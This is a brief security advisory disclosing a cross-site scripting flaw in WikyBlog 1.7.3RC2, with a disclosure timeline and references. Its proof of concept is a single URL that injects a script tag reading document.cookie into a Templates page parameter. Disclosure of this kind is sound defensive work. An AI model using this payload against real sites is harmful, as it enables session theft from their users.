WikyBlog 1.7.3RC2 Cross Site Scripting

2012.03.16
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Advisory: WikyBlog 1.7.3RC2 XSS vulnerability Advisory ID: SSCHADV2012-006 Author: Stefan Schurtz Affected Software: Successfully tested on WikyBlog 1.7.3RC2 Vendor URL: http://www.wikyblog.com/ Vendor Status: informed ========================== Vulnerability Description ========================== WikyBlog 1.7.3RC2 is prone to a XSS vulnerability ================== PoC-Exploit ================== http://[target]/WikyBlog-1.7.3rc2/index.php/Special/Main/Templates?cmd=copy&which='"<script>alert(document.cookie)</script> ========= Solution ========= - ==================== Disclosure Timeline ==================== 25-Feb-2012 - vendor informed 15-Mar-2012 - no response from vendor ======== Credits ======== Vulnerability found and advisory written by Stefan Schurtz. =========== References =========== http://www.darksecurity.de/advisories/2012/SSCHADV2012-006.txt

References:

http://www.wikyblog.com/
http://www.darksecurity.de/advisories/2012/SSCHADV2012-006.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top